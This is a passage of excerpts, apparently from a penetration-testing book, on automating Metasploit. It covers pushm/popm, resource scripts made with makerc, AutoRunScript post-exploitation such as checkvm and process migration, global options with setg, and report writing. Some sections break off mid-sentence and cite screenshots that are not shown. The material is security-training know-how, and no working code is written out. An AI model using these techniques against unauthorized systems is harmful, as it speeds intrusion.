Metasploit offers two great commands--namely pushm and popm. The pushm command pushes the current module onto the module stack, while popm pops the pushed module from the top of the module stack. However, this is not the standard stack available to processes. Rather, it is the utilization of the same concept by Metasploit; it is otherwise unrelated. Using these commands gives us speedy operations, which saves a lot of time and effort.

Consider a scenario where we are testing an internal server with multiple vulnerabilities. We have two exploitable services running on every system on the internal network. To exploit both the services on every machine, we require a fast switching mechanism between modules for both the vulnerabilities. In such cases, we can use pushm and popm commands. We can test a server for a single vulnerability using a module and can then push the module on the stack and load the other module. After completing tasks with the second module,...

Metasploit offers automation through resource scripts. The resource scripts eliminate the need to set the options manually, setting up everything automatically, thereby saving the large amount of time needed to set up the payload and the module's options.

There are two ways to create a resource script--namely by creating the script manually or using the makerc command. I recommend the makerc command over manual scripting since it eliminates typing errors. The makerc command saves all the previously issued commands in a file, which can be used with the resource command. Let us see an example:

We can see in the preceding screenshot that we launched an exploit handler module by setting up its associated payload and options such as LHOST and LPORT. Issuing the makerc command will save all these commands in a systematic way into a file of our choice, which in this case is multi_hand. We can see that makerc successfully saved the last six commands into the multi_hand...

Metasploit offers another great feature of using AutoRunScript. The AutoRunScript option can be populated by issuing the show advanced command. AutoRunScript automates post-exploitation, and executes once access to the target has been achieved. We can either set the AutoRunScript option manually by issuing set AutoRunScript [script-name], or by using the resource script itself, which automates exploitation and post-exploitation together. AutoRunScript can also run more than one post-exploitation script by using the multi_script and multi_console_command modules as well. Let us take an example where we have two scripts, one for automating the exploitation and the second for automating the post-exploitation, as shown in the following screenshot:

This is a small post-exploitation script that automates the checkvm (a module to check whether the target is running on a virtual environment) and migrate (a module that helps in migrating from the exploited process...

Working on a particular range or a specific host, we can always use the setg command to specify the LHOST and RHOST options. Setting the options with the setg command will set the RHOST or LHOST options globally for every module loaded. Hence, the setg command eliminates the use of setting up these specific options repeatedly. We can also make use of the setg command over other options, such as LPORT, RPORT, and payload. However, different services run on different ports, and we may need to alter the payloads as well. Hence, setting up options that do not change from a module to another module is a better approach. Let us have a look at the following example:

We assigned RHOST with the setg command in the preceding screenshot. We can see that no matter how many times we change the module, the value of RHOST remains constant for all modules, and we do not need to enter it manually in every module. The get command fetches the value of a variable from the current...

Let us now discuss how to create a penetration test report and see what is to be included, where it should be included, what should be added or removed, how to format the report, the usage of graphs, and so on. Many people, such as managers, administrators, and top executives, will read the report of a penetration test. Therefore, it's necessary for the findings to be well organized so that the correct message is conveyed to those involved and is understood by the target audience.

This chapter allowed us to work on speeding up the process of a penetration test by automating exploitation and post-exploitation using multiple types of resource scripts. We also saw the usage and benefits of pushm, popm, and variable globalization. By the end, we saw how we could design professional reports and how the various sections of the report are to be rendered.

Before we begin Chapter 7, Exploiting Real-World Challenges with Metasploit, it is advised that you run through all the examples covered in the book so far and learn each and every method covered in detail. However, no book will help you hone your skills unless you practice each and every thing while enhancing your research capabilities.

We will make use of each and every technique learned in the previous chapters to solve the challenges in the next one, while learning some new technologies. You can practice the following exercises before reading through Chapter 7, Exploiting...